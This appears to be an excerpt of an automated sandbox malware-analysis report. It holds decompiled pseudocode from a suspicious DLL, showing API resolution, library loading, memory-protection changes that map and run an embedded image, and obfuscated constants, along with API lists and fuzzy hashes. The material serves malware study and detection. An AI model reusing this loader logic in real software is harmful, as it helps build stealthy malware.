				_t18 = E10001A9E( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x100041c0 - 0x69b24f45 &  !( *0x100041c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x100041c0 - 0x69b24f45 &  !( *0x100041c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E1000188C(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E100015BD(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E100012D9(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E100020CA(_t42);
					L8:
					return _t29;
				}
			}

0x100017f0
0x100017f2
0x1000180e
0x1000181f
0x10001826
0x10001884
0x00000000
0x10001828
0x10001828
0x10001832
0x10001836
0x1000183b
0x1000183e
0x10001843
0x10001847
0x1000184c
0x10001851
0x10001855
0x1000185a
0x1000185b
0x1000185f
0x10001864
0x1000186c
0x1000186c
0x10001864
0x10001855
0x10001847
0x1000186e
0x10001877
0x1000187b
0x10001885
0x1000188b
0x1000188b

APIs

Part of subcall function 10001A9E: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001824,?,?,?,?,?,00000002,?,?), ref: 10001AC2
Part of subcall function 10001A9E: GetProcAddress.KERNEL32(00000000,?), ref: 10001AE4
Part of subcall function 10001A9E: GetProcAddress.KERNEL32(00000000,?), ref: 10001AFA
Part of subcall function 10001A9E: GetProcAddress.KERNEL32(00000000,?), ref: 10001B10
Part of subcall function 10001A9E: GetProcAddress.KERNEL32(00000000,?), ref: 10001B26
Part of subcall function 10001A9E: GetProcAddress.KERNEL32(00000000,?), ref: 10001B3C

Part of subcall function 100015BD: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 100015F5

Part of subcall function 100012D9: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001312
Part of subcall function 100012D9: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001387
Part of subcall function 100012D9: GetLastError.KERNEL32 ref: 1000138D

GetLastError.KERNEL32(?,?), ref: 10001866

Strings

@Mqt`fqt MqtTqt, xrefs: 10001866

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
String ID: @Mqt`fqt MqtTqt
API String ID: 3135819546-883350353
Opcode ID: 1d22c235101fd37308777b5c93cfad0d365d6df5f91b75ee65e56d9ba2dd4ad9
Instruction ID: 8dceb058ddb1d0841b6deb4a5eea2252f87ceb98a993250d4b83a85c830524d8
Opcode Fuzzy Hash: 1d22c235101fd37308777b5c93cfad0d365d6df5f91b75ee65e56d9ba2dd4ad9
Instruction Fuzzy Hash: DE11CB7A700716ABE711DBA58C84DDF77BCEF886947014169FA0197509EF60FD058790

Uniqueness

Uniqueness Score: -1.00%

Function 100013BB Relevance: 3.1, APIs: 2, Instructions: 60
stringthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E100013BB() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				void* _t24;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x100041c4;
				if( *0x100041ac > 5) {
					_t16 = _t15 + 0x100050f9;
				} else {
					_t16 = _t15 + 0x100050b1;
				}
				E10001B82(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				_t24 = E10001475( &_v32,  &_v16,  *0x100041c0 ^ 0xf7a71548); // executed
				if(_t24 == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x100041b8);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E10001C65(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t40 =  *0x100041b8;
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x100041b8 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E1000213E(_t45, _t40, _t32 + 4);
						}
					}
					_t25 = E100017E8(_v28); // executed
				}
				ExitThread(_t25);
			}

0x100013c1
0x100013d2
0x100013dc
0x100013d4
0x100013d4
0x100013d4
0x100013e3
0x100013ec
0x100013f1
0x10001408
0x1000140f
0x1000146c
0x10001411
0x10001417
0x1000141d
0x1000142b
0x1000142f
0x10001436
0x10001438
0x1000143e
0x10001442
0x1000144a
0x1000145b
0x1000144c
0x10001452
0x10001452
0x1000144a
0x10001463
0x10001463
0x1000146e

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 10001417
ExitThread.KERNEL32 ref: 1000146E

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 408326f186c5782c4d79bd109b6943c87451d7f53e230bdd5b0651c56608ae43
Instruction ID: a3a3f4d4317e42dda0baac6936ce10250e3376538df528e240401ac3a63dabf5
Opcode Fuzzy Hash: 408326f186c5782c4d79bd109b6943c87451d7f53e230bdd5b0651c56608ae43
Instruction Fuzzy Hash: 1011BF71508305ABF711DBA4CC89ECB77EEEB083C0F124926F545D7169EB30E6488B92

Uniqueness

Uniqueness Score: -1.00%

Function 10001B82 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E10001B82(void* __eax, intOrPtr _a4) {

				 *0x100041d0 =  *0x100041d0 & 0x00000000;
				_push(0);
				_push(0x100041cc);
				_push(1);
				_push(_a4);
				 *0x100041c8 = 0xc; // executed
				L10002138(); // executed
				return __eax;
			}

0x10001b82
0x10001b89
0x10001b8b
0x10001b90
0x10001b92
0x10001b96
0x10001ba0
0x10001ba5

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(100013E8,00000001,100041CC,00000000), ref: 10001BA0

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 8d0a15dda036848d7a76856f590672caeefc041b11455b992c0df7912536226e
Instruction ID: 33f9f12193caac8e8163f99f59111eb563d047ab736f7c18bda83a722b3984e7
Opcode Fuzzy Hash: 8d0a15dda036848d7a76856f590672caeefc041b11455b992c0df7912536226e
Instruction Fuzzy Hash: 62C04CF4180351A6F710EB40CCC5FC57A51B774789F120604F604241D9CBB61094851D

Uniqueness

Uniqueness Score: -1.00%

Function 10001911 Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10001911(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x10004190, 0, _a4); // executed
				return _t2;
			}

0x1000191d
0x10001923

APIs

RtlAllocateHeap.NTDLL(00000000,?,10001027,00000030,747163F0,00000000), ref: 1000191D

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 56578c2824af0b1aef2d414d4cc7a87fc3a78d739ea3ccaa026e2273e78627ab
Instruction ID: 5080a8298e34d3caf55d83596581ee9982b7336b11110065b2905dc1d2ce8e0b
Opcode Fuzzy Hash: 56578c2824af0b1aef2d414d4cc7a87fc3a78d739ea3ccaa026e2273e78627ab
Instruction Fuzzy Hash: FAB012B1100110ABEA024B01CE54F47BF22B764740F018010F30800078C7311860EF08

Uniqueness

Uniqueness Score: -1.00%

Function 100020CA Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E100020CA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x10004190, 0, _a4); // executed
				return _t2;
			}

0x100020d6
0x100020dc

APIs

RtlFreeHeap.NTDLL(00000000,00000030,10001A8B,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,10001075), ref: 100020D6

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2051ab4533615d9a7b269fd294d30c1d984618b842fbc63eb38b540fc0ffbd4d
Instruction ID: e627bfca09fef4e7784ed8cdc1e60a1b4a56cb491f5d62d79df9b2896f564e43
Opcode Fuzzy Hash: 2051ab4533615d9a7b269fd294d30c1d984618b842fbc63eb38b540fc0ffbd4d
Instruction Fuzzy Hash: 76B01271040110EBFA128B00CD54F067F23B764740F01C010F30400078C6318820FB18

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1000204A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000204A() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x100041b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x100041bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x100041ac = _t3;
						_t5 = GetCurrentProcessId();
						 *0x100041a8 = _t5;
						 *0x100041b0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x100041a4 = _t6;
						if(_t6 == 0) {
							 *0x100041a4 =  *0x100041a4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x1000204b
0x10002059
0x1000205f
0x10002066
0x100020bd
0x100020bd
0x10002068
0x10002070
0x1000207d
0x1000207d
0x100020b9
0x100020bb
0x00000000
0x00000000
0x00000000
0x10002072
0x10002079
0x1000207f
0x1000207f
0x10002084
0x10002092
0x10002097
0x1000209d
0x100020a3
0x100020aa
0x100020ac
0x100020ac
0x100020b6
0x1000207b
0x1000207b
0x00000000
0x1000207b
0x10002079

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000100B), ref: 10002059
GetVersion.KERNEL32 ref: 10002068
GetCurrentProcessId.KERNEL32 ref: 10002084
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 1000209D

Strings

@Mqt`fqt MqtTqt, xrefs: 100020BD

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID: @Mqt`fqt MqtTqt
API String ID: 845504543-883350353
Opcode ID: b10ee4d5b66489ec4efd9f17b717ea38e91e57b0f7af478cbc89a8789e8cf787
Instruction ID: dabbc1feec541a15a84e605d64bfff118f2b0d0a5e70643647fc5b5d1b03300c
Opcode Fuzzy Hash: b10ee4d5b66489ec4efd9f17b717ea38e91e57b0f7af478cbc89a8789e8cf787
Instruction Fuzzy Hash: 67F0C2B1A463319FF712DB78AC997C63BE4E7157D1F02811AE601C61ECDBB09481CB89

Uniqueness

Uniqueness Score: -1.00%

Function 100024A5 Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100024A5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x100041f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x10004240 = 1;
										__eflags =  *0x10004240;
										if( *0x10004240 != 0) {
											goto L60;
										}
										_t84 =  *0x100041f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x10004240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x100041f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10004200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x100041fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10004200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x10004240 = 1;
							__eflags =  *0x10004240;
							if( *0x10004240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10004200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10004200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x10004240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10004200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x100041f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10004200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x100024af
0x100024b2
0x100024b8
0x100024d6
0x00000000
0x100024d6
0x100024c0
0x100024c9
0x100024cf
0x100024de
0x100024e1
0x100024e4
0x100024ee
0x100024ee
0x100024f0
0x100024f3
0x100024f5
0x100024f5
0x100024f7
0x100024fa
0x00000000
0x00000000
0x100024fc
0x100024fe
0x10002564
0x10002564
0x100026c2
0x00000000
0x100026c2
0x10002500
0x10002500
0x10002504
0x10002506
0x10002506
0x10002506
0x10002506
0x10002509
0x1000250a
0x1000250d
0x1000250d
0x10002511
0x10002515
0x10002523
0x10002523
0x1000252b
0x10002531
0x10002533
0x10002535
0x10002545
0x10002552
0x10002556
0x1000255b
0x1000255d
0x100025db
0x100025db
0x1000255f
0x1000255f
0x1000255f
0x100025dd
0x100025df
0x100026c0
0x100026c0
0x00000000
0x100025e5
0x100025e5
0x100025ec
0x00000000
0x00000000
0x100025f2
0x100025f6
0x10002652
0x10002654
0x1000265c
0x1000265e
0x10002660
0x00000000
0x00000000
0x10002662
0x10002668
0x1000266a
0x1000266c
0x10002681
0x10002681
0x10002683
0x100026b2
0x100026b9
0x00000000
0x100026b9
0x10002687
0x10002688
0x1000268a
0x1000268c
0x1000268c
0x1000268e
0x10002690
0x10002692
0x100026a6
0x100026a6
0x100026a9
0x100026ab
0x100026ab
0x100026ac
0x100026ac
0x00000000
0x10002694
0x10002694
0x10002694
0x1000269d
0x1000269e
0x100026a0
0x100026a2
0x100026a2
0x00000000
0x10002694
0x10002692
0x1000266e
0x10002675
0x10002675
0x10002677
0x00000000
0x00000000
0x10002679
0x1000267a
0x1000267d
0x1000267f
0x00000000
0x00000000
0x00000000
0x1000267f
0x00000000
0x10002675
0x100025f8
0x100025fb
0x10002600
0x00000000
0x00000000
0x10002609
0x1000260b
0x10002611
0x00000000
0x00000000
0x10002617
0x1000261d
0x00000000
0x00000000
0x10002623
0x10002625
0x1000262e
0x10002632
0x00000000
0x00000000
0x10002638
0x1000263b
0x1000263d
0x00000000
0x00000000
0x10002644
0x10002646
0x00000000
0x00000000
0x10002648
0x1000264c
0x00000000
0x00000000
0x00000000
0x1000264c
0x00000000
0x00000000
0x00000000
0x10002537
0x10002537
0x10002537
0x1000253e
0x00000000
0x00000000
0x10002540
0x10002541
0x10002543
0x00000000
0x00000000
0x00000000
0x10002543
0x1000256b
0x1000256d
0x00000000
0x00000000
0x1000257d
0x1000257f
0x10002581
0x00000000
0x00000000
0x10002587
0x1000258e
0x100025ba
0x100025ba
0x100025bc
0x100025be
0x100025d2
0x100025d4
0x00000000
0x00000000
0x00000000
0x00000000
0x100025c0
0x100025c0
0x100025c0
0x100025c9
0x100025ca
0x100025cc
0x100025ce
0x100025ce
0x00000000
0x100025c0
0x10002590
0x10002593
0x10002595
0x100025a7
0x100025a7
0x100025aa
0x100025ac
0x100025ac
0x100025ad
0x100025ad
0x100025b3
0x00000000
0x00000000
0x00000000
0x00000000
0x10002597
0x10002597
0x10002597
0x1000259e
0x00000000
0x00000000
0x100025a0
0x100025a0
0x100025a1
0x00000000
0x00000000
0x00000000
0x100025a1
0x100025a3
0x100025a5
0x100025b8
0x00000000
0x00000000
0x00000000
0x100025b8
0x00000000
0x100025a5
0x10002517
0x1000251a
0x1000251d
0x00000000
0x00000000
0x1000251f
0x10002521
0x00000000
0x00000000
0x00000000
0x10002521
0x100024e6
0x100024e8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002556

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 3ec903066bb6216b222162eb792f040e7204150538ffd2b2a3f6ae75891f174f
Instruction ID: 5d3b303c2a225914fadfec5799b9f046b5d6f15d02ea2e119dbac732a25b50aa
Opcode Fuzzy Hash: 3ec903066bb6216b222162eb792f040e7204150538ffd2b2a3f6ae75891f174f
Instruction Fuzzy Hash: 1561EF70B00A528FFB19CF28DCE066973E5EB843D5F628069D856C72ADEB31DC828654

Uniqueness

Uniqueness Score: -1.00%

Function 10002284 Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E10002284(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E100023EB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E100024A5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E10002390(_t55, _t66);
										_t89 = _t66 + 0x10;
										E100023EB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E10002487(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x10002288
0x10002289
0x1000228a
0x1000228d
0x1000228f
0x10002292
0x10002293
0x10002295
0x10002296
0x10002297
0x1000229a
0x100022a4
0x10002355
0x1000235c
0x10002365
0x100022aa
0x100022aa
0x100022b0
0x100022b6
0x100022b9
0x100022bc
0x100022c0
0x100022c5
0x100022ca
0x1000234a
0x00000000
0x100022cc
0x100022cc
0x100022d8
0x100022da
0x10002335
0x10002335
0x1000233b
0x00000000
0x100022dc
0x100022eb
0x100022ed
0x100022ee
0x100022ef
0x100022f2
0x100022f2
0x100022f4
0x00000000
0x100022f6
0x100022f6
0x10002340
0x100022f8
0x100022f8
0x100022fc
0x10002304
0x10002309
